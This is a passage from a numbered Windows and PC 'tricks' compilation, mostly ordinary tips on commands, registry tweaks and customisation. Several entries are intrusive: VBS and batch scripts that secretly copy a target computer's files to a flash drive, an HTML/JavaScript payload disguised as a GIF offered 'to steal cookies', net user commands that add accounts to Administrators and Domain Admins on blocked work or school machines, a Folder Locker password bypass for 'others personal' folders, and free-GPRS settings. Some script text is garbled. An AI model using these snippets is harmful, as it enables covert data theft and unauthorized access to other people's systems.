System File Checker Utility (Purge File Cache) - sfc /purgecache

System File Checker Utility (Set Cache Size to size x) - sfc /cachesize=x

System Properties - sysdm.cpl

Task Manager - taskmgr

Telnet Client - telnet

User Account Management - nusrmgr.cpl

Utility Manager - utilman

Windows Firewall - firewall.cpl

Windows Magnifier - magnify

Windows Management Infrastructure - wmimgmt.msc

Windows System Security Tool - syskey

Windows Update Launches - wupdmgr

Windows XP Tour Wizard - tourstart

Wordpad write
Trick-138
Making free calls through skype
Steps:
1. Download the Skype
2. Sign up an account on skype.
3. Now Add +18003733411 to your Contacts.
4. Now Click on call Button On the Above Shown Number.
5.Now Listen the Call Carefully. When He/She says the Freee calls .
At that time You also hav to say the Free calls . Now wait Untill she
says type your Country Code First.. then u hav to dial the Number and
ur Call will be connected .. Dont forget to add country code before it..

Trick-139
Hide your Computer in local
network

This is tutorial show you how to Hide your pc in local network.
info :
when you hack any local network like wireless you want be invisible so no one
can see your pc in that local network .

note :
if you have it already local network name WORKGROUP will pass step 1 go to
step 2.
1 - go to: My Computer ----> Properties ----> Computer Name ----> Change -----
> WORKGROUP = Change to WORKGROUP next restart your pc .

2 - go to Start -------> Run ------- Cmd then type on command line:
net config server /hidden:yes
after that you will get message from system on command line like this :
The command completed successfully.

C:\Documents and Settings\Imports.system>net config server /hidden:yes
The command completed successfully.

after 30 min you will be invisible check your "My Network Places"
My Network Places --------> View workgroup computers .

><><><><><><><><><><>
if want be visible change yes to no like this :
net config server /hidden:no
note:
it's work with win XP Sp2 i haven't tried it on win xp SP3 yet or vista
Trick-140
"ctfmon.exe" always runs in background
and on "End Process", it restarts
automatically.


Solution:

Open Control Panel and goto Add/Remove Programs list. Now click on
the Microsoft Office entry and then click on "Change" button. Now
select "Add/Remove Features" and click on "Next". Now expand
"Office Shared Features" and click on "Alternative User Input" and
then select "Not Available" and finally click on Update. It'll permanently
remove that ctfmon.exe and your problem will be solved.
Trick-141
Kill Processes from Command
Prompt

I'm sure you are familiar with the traditional way to kill or end a process in
Windows using Task Manager. This method is effective but not nearly as fun as
killing a process in Command Prompt. Additionally, killing processes in
Command Prompt provides much more control and the ability to end multiple
processes at once.

All of this is possible with the TaskKill command. First, let's cover the basics.
You can kill a process by the process ID (PID) or by image name (EXE
filename).

Open up an Administrative level Command Prompt and run tasklist to see all of
the running processes:

C:\>tasklist

Image Name PID Session Name Mem Usage
=========== ============== ========
firefox.exe 26356 Console 139,352 K
regedit.exe 24244 Console 9,768 K
cmd.exe 18664 Console 2,380 K
conhost.exe 2528 Console 7,852 K
notepad.exe 17364 Console 7,892 K
notepad.exe 24696 Console 22,028 K
notepad.exe 25304 Console 5,852 K
explorer.exe 2864 Console 72,232 K
In the example above you can see the image name and the PID for each
process. If you want to kill the firefox process run:

C:\>Taskkill /IM firefox.exe /F

or
C:\>Taskkill /PID 26356 /F

The /f flag is kills the process forcefully. Failure to use the /F flag will result in
nothing happening in some cases. One example is whenever I want to kill the
explorer.exe process I have to use the /F flag or else the process just does not
terminate.

If you have multiple instances of an image open such as multiple firefox.exe
processes, running the taskkill /IM firefox.exe command will kill all instances.
When you specify the PID only the specific instane of firefox will be terminated.

The real power of taskkill are the filtering options that allow you to use the
following variables and operators.

Variables:

*STATUS
* IMAGENAME
* PID
* SESSION
* CPUTIME
* MEMUSAGE
* USERNAME
* MODULES
* SERVICES
* WINDOWTITLE

Operators:

* eq (equals)
* ne (not equal)
* gt (greater than)
* lt (less than)
* ge (greater than or equal)
* le (less than or equal)

"*" is the wildcard.

You can use the variables and operators with the /FI filtering flag. For example,
let's say you want to end all processes that have a window title that starts with
"Internet":
C:\>taskkill /FI "WINDOWTITLE eq Internet*" /F

To learn more about taskkill run it with the /? command just like any other
Windows command

Trick-142
MS OFFICE Word 2007 Voice Command


Use a Voice Command
You can use sound in Microsoft Office Word.

1. In the Word document, place your cursor where you want your voice
message to go.
2. Click Insert, and then in the Text section, click the Insert Object button.
3. In the Object dialog box, on the Create New tab, in the list of object types,
select Wave Sound.
4. Click OK, and then record your own voice note.


Trick-143
Create Gtalk Themes

Here I am going to tell you that how you can create your own GTalk
themes.

So let start :


First open your C drive and go to Tools, in the upper horizontal bar
and select Folder Options. In the View tab put a tick on Show Hidden
Files and Folders and click on Apply and then OK. After doing this
navigate to

C>>Documents and Settings>>profile name>>Local
Settings>>Application Data>>Google>>Google
Talk>>themes>>system>>chat

In the Chat folder you will see about 10-11 default themes. Now select
a particular theme and double click on it and go to
Contents>>Resources

In the Resources folder you will see main.css file. The main.css is the
file which helps in defining the look of the GTalk theme.

Now to create your own theme you have to edit main.css file. Just
open it with Notepad and you can add your own images, change
colours and can do alot of changes.

After editing open your GTalk and go to Settings>>Appearance and
select the theme you have edited.

Trick-144
Copy Files to Flashdisc Silently

Tricks To Copy Data Flash Disk-Still In Silence
1. Open notepad, create a vbs file type or copy and paste the following
script:
dim wshshell, dos
wscript.createobject set wshshell = ( "wscript.shell")
dos = wshshell.expandenvironmentstr ings ( "% coms ...
wshshell.run (dos & "/ c tarik.bat"), vbhide
2. Save as all files with start.vbs name
3. Open notepad again, make a bat file type or copy and paste the
following script:
@ echo off
mkdir% computername%
xcopy "C: \ Documents and Settings \% username% \ My Documents \
*. jpg"% computername% / s / c / q / r
@ cls
@ exit
4. Save the file name tarik.bat save as type select all files.
Bat file name should be in accordance with the vbs script file line to
four (tarik.bat)
Save the file in the flash disk, copy files to the target computer secretly
run (2x click) file start.vbs.
Vbs file function (start.vbs) function to run a bat file (tarik.bat) secretly
term or background process. While the bat file (tarik.bat) function to
run the copy all files with a certain extensions in the target computer.
Example above is a copy of all the files jpg extension(image file) is in
the My Documents folder on the target computer (see the third line
script bat file) and saved into the flash disk into the appropriate folder
with the name of the target computer. you can edit their own page on
the second file format as needed files and folders on the target you will
copy.

Trick-145
HIDE USER ACCOUNTS FROM CONTROL PANEL

To Hide Perform the following Steps
Go to Start/Run, and type:
GPEDIT.MSC
Open the path
User Config > Admin Templates > Control Panel
doubleclick "Hide specified Control Panel applets"
now select 'enabled', then click 'Show"
click Add button,
type "nusrmgt.cpl" into the add box and click Ok..Now you can't see the User Accounts
in the control panel..!

Trick-146
lock the 'TASKBAR'

Go to run. type 'gpedit.msc'. From there, Local computer policy>user
configuration>Administrative templates>Systems>Alt+Ctrl+Del
options>Remove task manager>Enabled.

Trick-147
Block USB Drive (A Registry Tweak)

To this what can be done is that the USB can be blocked and then stopping
the use of USB drives. Here is a simple registry hack to do so, try it with care.

1. Go to Start > Run, type Regedit.
2. Go to HKEY_LOCAL_MACHINE\System\CurrentControlset\Servic
es\USBStor
3. In the right pane, look for value Start and have value as 0000000(3)
4. Double click on that and change that value to 4.

You might be required to restart the PC, and then you are done with it, USB is
now blocked.

In case if you want to get the USB unblocked, just change the value again to 3
__________________

Trick-148
Customise your USB memory
stick

Open Notepad and type in the following

[autorun]

icon = *******.ico

label = *******

Change the ***** next to icon to what ever the icon is you want to use
ie. monkey.ico

Change the ***** next to label to whatever you want to name your USB
stick
ie. Monkeyweasels USB

so using my examples you end up with:

[autorun]

icon = monkey.ico

label = Monkeyweasels USB

Now save this on the root of your USB Drive with the name

autorun.inf

Also place the icon you chose to use in the Root of your USB Drive

Next time you plug in your USB Drive it will appear with the new icon
and name

Hide them by...

* right-clicking both inf file and icon
* choosing Properties...
* then tick the box entitled Hidden and
Trick-149
Find installation date

Goto Start->RUN->CMD
and type the following:

systeminfo | find /i "install date"

This command pipes the output of the systeminfo.exe command into
the find.exe command to locate the line of text that contains the string
"install date" and displays the result.


Trick-150
Windows Xp Folder Codes !!

Create a folder or shortcut without a name (and I mean really nothing!)


Create a new folder with the name X.
Open the command prompt and rename it to one of the following:

.{20D04FE0-3AEA-1069-A2D8-08002B30309D} (= My Computer)
.{450D8FBA-AD25-11D0-98A8-0800361B1103} (= My Documents)
.{208D2C60-3AEA-1069-A2D7-08002B30309D} (= My Network
Places)
.{645FF040-5081-101B-9F08-00AA002F954E} (= Recycle Bin)
.{871C5380-42A0-1069-A2EA-08002B30309D} (= Internet Explorer)
.{21EC2020-3AEA-1069-A2DD-08002B30309D} (= Control Panel)
.{D20EA4E1-3957-11D2-A40B-0C5020524153} (= Administrative
Tools)
.{00020D75-0000-0000-C000-000000000046} (= Inbox)
.{D20EA4E1-3957-11D2-A40B-0C5020524152} (= Fonts)
.{7007ACC7-3202-11D1-AAD2-00805FC1270E} (= Network
Connections)
.{2227A280-3AEA-1069-A2DE-08002B30309D} (= Printers and
Faxes)
.{7BE9D83C-A729-4D97-b5A7-1B7313C39E0A} (= Programs Folder)
.{E211B736-43FD-11D1-9EFB-0000F8757FCD} (= Scanners and
Cameras)
.{D6277990-4C6A-11CF-8D87-00AA0060F5BF} (= Scheduled Tasks)
.{48E7CAAB-B918-4E58-A94D-505519C795DC} (= Start Menu
Folder)
.{7BD29E00-76C1-11CF-9DD0-00A0C9034933} (= Temporary
Internet Files)
.{BDEADF00-C265-11d0-BCED-00A0C90AB50F} (= Web Folders)
.{6DFD7C5C-2451-11D3-A299-00C04F8EF6AF} (= Folder Options)
.{00020801-0000-0000-C000-000000000046} (= Folder)
.{00021400-0000-0000-C000-000000000046} (= Another Folder)

For example: "rename X .{20D04FE0-3AEA-1069-A2D8-
08002B30309D}"



Trick-151
Disabling the ability to click on My
Computer

You can restrict any user to access your system drives if you disable
the click feature on My Computer. User will get no changes when he
will try to open My Computer.

By editing the windows registry keys, you can disable the click feature
on My Computer.
Follow the given steps to disable My Computer setting.


1] First click on Start button then type Regedit in Run option.
2] In registry editor panel search the value 20D04FE0-3AEA-1069-
A2D8-08002B30309D
3] May be you will find this value on path HKey_Classes_Root \ CLSID
section.
4] Here delete the entire section of this value.
5] Now close the registry editor and restart your computer after any
changes to go into effect.

Trick-152
How to make a file of the size you want

Let us assume you want to make a file of size 10000kb
Convert it to bytes -> 10000*1024 which comes out to be 10240000
bytes

Open calculator (win key+r -> type in calc )
Choose view mode to be Scientific one
Type in 10240000 and convert it to hex it comes out to be 9C4000
Convert this value to 8 digits by padding zeroes to its left -> so finally it
comes out be 009C4000

Open Command Prompt (win key + r -> type in cmd )
Type DEBUG filename.dat
it'll show file not found error ,ignore it
Type RCX -> Enter -> then last four hexadecimal numbers i.e. 4000 -
>Enter
Type RBX -> Enter -> then first four hexadecimal numbers i.e. 009C-
>Enter
Type W ->Enter
Type Q ->Enter

W stands for write and Q for quit

Now check the file you just made by dir command ->dir filename.dat

Using the same technique you can make files as big as you want






Trick-153
Hide Folder From Others... Even Admin ...

Guys, this is a trick in your PC to Prohibit any user (Even Admin OR
YOURSELF) to access your Folder....Because not everyone knows this trick.

Our Mission:
We'll will lock the folder from all the users... Even your Self, Because we know
that not every time though we are admin and we have our personal account....!!

So, We will prohibit that folder from everone... Even Ourselves. Don't worry we
will unlock them too

WARNING: It's better to try on non-usable OR NEW FOLDERS first for newbies

Trick Steps:

1) Go to "Folder Options" > "View" >

There is last option called "Use Simple File Sharing (Recommended)". Remove
check from it.... then click "OK".

2) Go to the Properties from which you want to remove access.

3) Go to tab "Security". There are listed "User Names" who can access that
folder as written under: "Group OR Usernames"

4) Now, Click on advanced >
remove Check from....
"Inherit from Parent the permissions entries that apply..................."
> Click "Remove."

5) Click OK.

Now, try to access that folder, you will not be able to access it....

Back to Normal:

1) Just Go to Property > Security > Advanced >
& check that option again of
"Inherit from Parent the permissions entries that apply..................."

2) Click OK. Now you should able to access your folder again..



OR you can also add your users only from Property > Security > Advanced >
Add > Advanced > Find now > "Select User".....


Trick-154
Open locked folder without knowing its
password

Folder locker is one of the most used application for windows to lock some
personal files. There is some time when we forget the password and due to
which we are not able to acess some of our personal files/folders.

Today here I am writing how to open folder locked XP without knowing its
password. So here the trick for those who forgot their password of folder locked
xp or who wants to get into others personal folder.

To unlock just follow simple steps : -

Open C:\WINDOWS
Then just find regedit
Open It by double clicking there In The Left Side you will see Something like :
HKEY_LOCAL_MACHINE just click it.
Then find the file name software In the list and open it.
Then Find The Name called EverStrike. doubleclick It..
You will see LF30 Just click it.
On the right Side Some thing will appear out of those Select the file named
Password & Delete It.

Trick-155
Process to Get The Any Drivers For Your
Pc -

Code:

- Visit Windows Update (XP Only)
- Look at the left hand pane and under Other Options click Personalize
Windows Update.
- Now in the right hand pane check the box - Display the link to the Windows
Update Catalog under See Also
- Below Choose which categories and updates to display on Windows Update -
make sure you check all the boxes you want shown.
- Click Save Settings
- Now look in the left hand pane under See Also click Windows Update Catalog
and choose what you're looking for. Choose either MS updates or drivers for
hardware devices.
- Start the Wizard and off you go.

There are a TON of drivers there. I highly recommend you take a look at this
page prior to downloading something from the web.

Save Your New Downloads

Since some people are still using modems and since MS is issuing patches
right and left for XP wouldn't it be nice if after you downloaded all the updates
you could save them? Well, you can and MS has provided a way for you to do
it.
Here's How:
- Logon to Windows Update
- Choose Windows Update Catalogue (left hand pane)
- Choose Find updates for Microsoft Windows operating systems (right hand
pane)
- Choose your version and language then Search
- Choose one the following:
- Critical Updates and Service Packs
- Service Packs and Recommended Downloads
- Multi-Language Features (0)
- Once chosen simply click on what you want to download and then back at the
top click Review Download Basket
- You are taken to the next page where at the top you can specify where the
downloads are to be saved.
- Click Download now.

Each patch will make a directory under the root of the folder you saved them to.
Once finished you need to go to where you saved the file (s) to and then simply
install all your patches.
Read-me's are available in each patch section so you know which one you are
installing.

Copy in Notepad better for you....

Trick-156
Disable Access to Add or Remove
Programs..

Suppose for security purpose you want to restrict other users from
uninstalling any programs.

Just delete all the uninstall links of the programs from the start menu
as all most all programs can be removed from control panel > add or
remove programs option & then disable access to the add or remove
programs itself.

So here's the hack


Start regedit by go to start > run & type in regedit and press enter.

Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies

Right click on policies & create a new key by selecting new > key.

Name the new key Uninstall

Now select the newly created key ie Uninstall.

Now create a new DWORD value on the right pane of the regedit
window

and name it NoAddRemovePrograms and set value to 1.


This should disable your Add or Remove Programs.


To re-enable your Add or Remove Programs just set the early created

NoAddRemovePrograms keys value to 0






Trick-157
How to add your own windows
tips

Are you sick of seeing the same tips again and again when you first
logon to Windows? Now you can change them to whatever you want,
whether it's quotes, jokes or a to-do list, anything is possible.

Open your registry and find the key below.

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\
CurrentVersion\ Explorer\ Tips

Create a new string valued named by incrementing the existing value
names and set it to the required tip text.

eg. 32

Trick-158
Hide HTML Code to GIF

CODE

Quote:
<GIF89a?8f?>

<html>
<head>
</head>
<body>
<script>
alert("0wNeD by None!")
</script>
<body>
</head>
then save this as a .GIF file! then use this gif as avatar it works only in
Internet Explorer! Or use this to steal cookies...


Trick-159
Enter and Browse any Forum
without registering

Whenever you need any information for which you are eager to know about and
then Forum will ask you to register and login and then only you will be able
to see that thing. You will probably find some another alternative rather than
registering (then let it be free!) to any website. After registering, there is no
guarantee to get complete and correct information so, why not try to get in
and browse everything without registering?

These websites generally doesnt allow unregistered users or guests to enter
but they do allow Google Bot or any other search engine bot to enter for
crawling purposes

You will need to change user agent to Google bot for browsing forums.

What you need is Firefox Browser and User Agent Switcher [Serch On
Google] After installing, create another user agent from the options menu of
the addon.
Select User Agent from the left sidebar and click Add. Now in the description
field type:


Code:
Quote:
crawl-66-249-66-1.googlebot.com
and in user agent field type:

Code:
Quote:
Googlebot/2.1 (+http://www.googlebot.com/bot.html)
Now Start browsing by selecting the user agent as Google Bot.


Trick-160
Vodafone Hack For Free GPRS

This method has been tested on different mobiles and has been confirmed to
be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live(.)vodafone(.)in [Remove the brackets]
User Name: (no need)
Pass: (no need)

Access Point Settings:-
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number
to:-

Proxy Port: 9401
Trick-161
Linux Basic Commands

For changing directory / to /etc
[root@pc1 /]# cd /etc

One step back /etc to /
[root@pc1 etc]# cd ..

Go to previous working directory
[root@pc1 /]# cd -

Go to current login user home directory
[root@pc1 etc]# cd ~

Show the contents of /etc in single color
[root@pc1 ~]# dir /etc

Show the contents of /etc in different colors with nature of contents
[root@pc1 ~]# Ls /etc

create a folder on root partition
[root@pc1 ~]# mkdir /disk

Create a folder in /disk
[root@pc1 ~]# mkdir /disk/dir

Create multiple folder in multiple directories with single command
[root@pc1 ~]# mkdir /etc/dir1 /var/dir2 /usr/dir3

Create multiple folder in same directory
[root@pc1 ~]# mkdir dir1 dir2 dir3

Copy a file in directory
[root@pc1 disk]# cp file dir

Copy a file from /disk/file and paste it in /disk/dir/
[root@pc1 disk]# cp /disk/file /disk/dir

Copy a directory with -r option
[root@pc1 disk]# cp -r dir dir2

Copy a file from /disk/file and paste it in /etc with myfile name
[root@pc1 disk]# cp /disk/file /etc/myfile

Remove a file
[root@pc1 disk]# rm file

Remove a file with forcefully option
[root@pc1 disk]# rm -f file

Remove a directory with out -r option and you face will an error
[root@pc1 disk]# rm dir

Remove a directory with -r option
[root@pc1 disk]# rm -r /disk

Remove a directory with forcefully option
[root@pc1 disk]# rm -rf dir

Move /etc/dir1 to /disk/ with different name
[root@pc1 disk]# mv /etc/dir1 /disk/mydir

Rename the folder name mydir to dir
[root@pc1 disk]# mv /disk/mydir /disk/dir

Rename the file name with myfile
[root@pc1 disk]# mv file myfile

Read a file page by page with less command
[root@pc1 disk]# less /etc/grub.conf

Read a file page by page with more command
[root@pc1 disk]# more /etc/qrub.conf

Read first ten lines of grub.conf
[root@pc1 disk]# head /etc/grub.conf

Read last ten lings of grub.conf
[root@pc1 disk]# tail /etc/grub.conf

Read first 12 lines with -n option
[root@pc1 disk]# head -n 12 /etc/grub.conf

Read last 11 lines with -n option
[root@pc1 disk]# tail -n 11 /etc/grub.conf

Copy the contents of /etc/grub.conf in /disk/file
[root@pc1 disk]# cat /etc/grub.conf > /disk/file

Append the contents /etc/mtab in /etc/file
[root@pc1 disk]# cat /etc/mtab >> /disk/file

Merging tow commands with pipe sign output of the first command is input of
second command
[root@pc1 disk]# cat /etc/squid/squid.conf I more

Count the total lines of squid.conf
[root@pc1 disk]# cat /etc/squid/squid.conf I wc -L

Show only spool words in squid.conf
[root@pc1 disk]# cat /etc/squid/squid.conf I grep spool

Flush the contents of file
[root@pc1 disk]# cat /dev/null > /var/log/messages
Trick-162
Modify Your CD-ROM to Watch DVD
Movies

There are two types of CD-ROM drives we can mod:
24x to 40x
40x or higher

Drives slower than 24x are too old to be modded.

24x to 40x CD ROMs

Laser Head Adjustments:
The track pitch of CDs is 1.6 microns, and the track pitch of DVDs is only 0.8
microns. The minimum length of track pits of CDs is 0.843mm, and the
minimum length of track pits of DVDs is 0.293mm. That's why DVD discs can
store much more data in the size of a CD.

Pinpointing this situation, we need to adjust the laser head so it can read discs
with smaller track pitchs and shorter track pits. Open up the CD-ROM drive, do
you see a lens on the rail? That's the laser head. On the side of the laser head,
there's a screw you can adjust.

This is the key of this mod.
This screw can adjust the size of the laser beam that lands on the disc.
Referring to the above, after adjusting, the laser beam should be less than
0.293mm, to suit the needs of DVD discs. So turn that screw 2-3 times. I got
this number through trial and error. Mark with a pencil, in case you forget how
many times you turned that screw.

Speed adjustments:
DVD-ROM drives can play DVD movies smoothly at 4x speed. If we're modding
a 32x CD-ROM drive, the rotation speed is obviously too high, increasing heat,
and shortening the life of the drive.

So we need to decrease the speed of it.
Most people know that power supplies can provide 5V (red wire) and 12V
(yellow wire) electricity output for Molex connectors. Find the Molex connector
you'll plug into the modded CD-ROM drive, cut the yellow wire or insulate it with
tape, so only 5V of electricity is transferred to the CD-ROM drive. The speed of
the drive is now 32 * 5/17 = 9.41x and can now fulfill our requirements.

40x or higher CD ROMs

When 40x CD-ROM drives are released, most manufacturers are already
producing DVD-ROM drives. To lower cost, they use the same core as DVD-
ROM drives with DVD functions disabled. What we need to do here is to re-
enable the DVD function.
Open up the CD-ROM, behind the circuit board, look for a jumper that says
DVD JUMP. Find a jumper to connect this jumper. Thin metal wire also works
fine.

OK, so the DVD function is unlocked, but we still need to decrease the speed.
Use the instructions above on how to decrase the speed of the drive.

Notes:
Modded drives cannot be detected in POST, that means you cannot use it in
DOS. But once you get into Windows, the drive works fine.
Modded drives have no region code problems.
Modded drives MIGHT NOT read DVD9 discs, that's why I said you can watch
most retail DVDs in the beginning
Trick-163
Disabling the Vista Black Screen


*First we need to open group policy.
*Go to Start.
*Open accessories.
*Open Run.
*And type in gpedit.msc.
*Then again continue at the annoying Windows needs your
permission to continue window.
*Then select Computer Configuration.
*Then Windows Settings.
*And then select Security Settings.
*Open Local Policies.
*Double click on Security Options.
*Now you need to scroll down to the policy named User Account
Control: Switch to the secure desktop when prompting for elevation
and you need to double click on it to open the next window.
*Select disable, click on apply and OK.
Trick-164
How to auto restart Windows Xp and Vista
in case of System Failure


Windows Blue Screen of Death in both of Xp and Vista are the most terrible
thing which happens when there is a system failure and machine comes to an
halt. The next you do is power down the machine and start it manually.
However you can change this to make it restart automatically after the dump is
created instead of waiting.

* Right click on My Computer and Click Properties
* Click on settings of System and Recovery.
* Remember this place is you can configure what the system will do when it
gets into system failure.
* Just check the check box which says Automatically restart

Now the next time your computer goes for a system failure it will auto restart.
But You will have to wait for the dumb to get created. Moreover you can also
check for Overwriting the old dump file in case you want to save some space.


Trick-165
How to access cmd if it is
blocked
This is a guide that can give you access to cmd.exe if it is blocked at your work
or school.
1-Open notepad

2-Type "command.com" in the text file

3- Save the file as command.bat( or whatever you want, as long as it ends in
.bat.)

Additional Tips


Admin Control-
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group "Domain Admins" YOURUSER /add >> Add_admin.txt
Trick-166
Windows xp hidden
apps

Some you know... some may be not...

To run any of these apps go to Start > Run and type the executable name (ie
charmap).

WINDOWS XP HIDDEN APPS:
=========================================

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound
cards)

6) Private character editor = eudcedit.exe (allows creation or modification of
characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing
package)

Microsoft Synchronization Manager = mobsync.exe (appears to allow
synchronization of files on the network for when working offline. Apparently
undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player,
very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with
databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion
in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells
you everything you ever wanted to know about any aspect of PC performance,
for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually
non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows
Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on
network).

17) File siganture verification tool = sigverif.exe

1 Volume Contro = sndvol32.exe (I've included this for those people that lose it
from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just
like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's
virtually undocumented but it appears to encrypt all passwords, I'm not sure of
the full implications).

21) Microsoft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring
the actions of drivers, might be useful for people having driver problems.
Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT
utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)

25) gpedit.msc used to manage group policies, and permissions
Trick-167
Google's Help In Opening Blocked Site's

You can open a blocked site with the help of using Google Translator!!!!!!
Quote:
http://www.google.com/translate?langpair=en|en&u=www.blockedsite.com
(where blockedsite.com is the site that you wish to visit)
Trick-168
Recovering Scratched CD's

Heres an easy home remedy, which might give you the desired results. Rub a
small amount of toothpaste on the scratch and polish the CD with a soft cloth
and any petroleum-based polishing solution (like clear shoe polish). Squirt a
drop of Brasso and wipe it with a clean cloth.

Technology to the rescue:There are many softwares available on the net, which
enable the recovery of the CD data. BadCopy Pro is one such software, which
can be used to recover destroyed data and files from a range of media.
Just a few clicks is all it requires to recover the disc from almost all kind of
damage situation; be it corrupted, lost data, unreadable or defective.
DiskDoctors is another popular company, which offers both software and
solutions to recover data from a scratched CDs and DVDs


General Tips:
* Always wipe the CD from the center outward with straight spoke-like strokes.
Wiping CDs in circles will create more scratches.
* Do not scratch the graphics layer as you cannot repair the disc.
HINT: Hold the disc up to a light with the graphics layer facing the light source.
If you can see light thru the scratches at any point then the disc may be
irreparable and or exhibit loading or playing errors.
* Clean your Disc players lens regularly with a suitable product to ensure
optimal viewing pleasure.
* Make sure to use a soft, lint-free cloth to clean both sides of the disc. Wipe in
a straight line from the centre of the disc to the outer edge.
* If wiping with a cloth does not remove a fingerprint or smudge, use a
specialized DVD disc polishing spray to clean the disc.
Trick-169
How to Change the color of your
START menu button

1. Goto C:\WINDOWS\Resources\Themes and copy both Luna.theme and Luna folder to
desktop.

2. From desktop, Change the names; Luna.theme to Orange.theme (or whatever name u
want) and Luna folder to orange.

3. Open Orange.theme in Notepad and replace all the words "LUNA" with "Orange"

4. Open Orange folder from desktop and change the name of Luna.msstyles to
Orange.msstyles

5. Now cut/copy both orange.theme file and orange folder back to
C:\WINDOWS\Resources\Themes

6. Download Resource Hacker

7. Use Resource Hacker to open your Orange.msstyles file from
C:\WINDOWS\Resources\Themes\Orange\Orange.msstyles
8. You can replace any or all of the STARTBUTTON_BMP files that are located in the Bitmap
section. There are 3 different sets: BLUE_STARTBUTTON_BMP,
HOMESTEAD_STARTBUTTON_BMP, AND METALLIC_STARTBUTTON_BMP, for BLUe, OLIVE
GREEN and SILVER color scheme respectively.So here, im ging to change the color for only
Blue color scheme, so i'll use BLUE_STARTBUTTON_BMP.

9. Right click on 1033 under BLUE_STARTBUTTON_BMP folder and from menu, select the
3rd option--> SAVE [BITMAP :BLUE_STARTBUTTON_BMP:1033]. save it to desktop with any
name. (don't close your Resource hacker)

10. Open the newly saved bitmap file in any paint editer and edit it. The three green
buttons you will see are the original Start buttons. so edit them according to their
apearence. Dont remove the blue lines and purple color (it won't appear in the Start button)
and dont change the size of the image.Edit the green part only.After editing, save the
bitmap file with any name.
11. (I hope u havent closed the Resource hacker....if yes...no problem, again Use Resource
Hacker to open your Orange.msstyles file from
C:\WINDOWS\Resources\Themes\Orange\Orange.msstyles ) Now again right click on 1033
under BLUE_STARTBUTTON_BMP folder in Resource hacker > Replace Resource.. > Open
the file with new bitmap > (select your edited bitmap from desktop) > Replace. Then click
file > SAVE.

12. You are almost done here...only one thing more to do....Download UXtheme.dll file for
your windows and save it to your harddrive..not your Desktop.

NOTE:
Make sure that you download the right uxtheme.dll file for your system.
To check your exact Windows version, go to Start --> All Programs --> Accessories
--> System Tools --> System Information. On the System Summary page (the
first page shown), look at the line that reads "Hardware Abstraction Layer".
It should say something like (in my case) Version = "5.1.2600.2180
(xpsp_sp2_rtm.040803-2158)":

The last four number (.2180 in this example) must match the version of the
pre-patched uxtheme.dll file you download. To check the file version, right-click
the uxtheme.dll file you downloaded and go to Properties --> Version (tab):

The File Version of the file should match the version listed beside Hardware
Abstraction Layer in System Information. Language can be confirmed here
also.

If the file version does not match that of your system, don't copy the file
into your system32 folder. It won't work.

13. Restart your PC in Safe Mode, go to C:\WINDOWS\ system32 and find the file
uxtheme.dll, rename it to uxtheme2.dll (as a backup). Now copy your downloaded
UXtheme.dll file to C:\WINDOWS\ system32.

14. Restart your PC in Normal Mode, Goto Display Properties > Appearance and you will
see two WINDOWS XP STYLE options under WINDOWS AND BUTTONS option..one of them is
yours (probably the first one). Select it, also select your color scheme as Blue (if it is not)
and hit ENTER....and enjoy a new look of you Start menu button........
Rather going to Rapidshare link better try teamviewer.com coz rapidshare file may
contain virus.
Trick-170
Repair corrupted taskmanager
many times we suffer the problem that due to a virus or a corrupted program
the taskmanager is being corrupted also.
Like "Taskmanager is disabled by your administrator"
Anti virus or other program can't heal it.

Now we can, just copy the line below without the Q marks- paste in run
command- then click ok

"REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System
/v DisableTaskMgr /t REG_DWORD /d 0 /f"

Problem solved
Trick-171
Fast Shutdown
Bored of Pc Shutdown time?
It takes a long time?
No worries, just a simple regedit trick will reduce pc's shutdown time

1. Click on Start and select Run. Type regedit. This will bring up the registry
editor.
2. Export your registry backup in case you mess up anything. Its not really
anything serious but at least you can bring back the settings in case you
wander off from the guide.
3. Find the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l
4. Click on the control folder and there is a parameter called
WaitToKillServiceTimeout. A form will appear where you can enter a value.
Change the number to a lower number for e.g. 1000.
5. Restart the pc so that Windows will load the new registry value. Now
shutdown will be much faster.

Plz note that It may damage ur pc so use it at ur own risk.
Trick-172
Make the computer go "ding" then popup a messege

Open Notepad.

Write This Code:
Quote:
Set objVoice = CreateObject("SAPI.SpVoice")
Set objFile = CreateObject("SAPI.SpFileStream.1")

objFile.Open "c:\Windows\Media\Ding.wav"
objVoice.Speakstream objFile
Wscript.Echo "your message here"
where the "c:\windows\Media\Ding.wav" put what sound file you want to be
played. I think it only likes .wav i havent tryed out .wma or .mp3 yet. Also
where it says "your message here" is the message that gets dispalyed after the
sound.

Save as anyname.vbs
Trick-173
IP commands
Display Connection Configuration: ipconfig /all

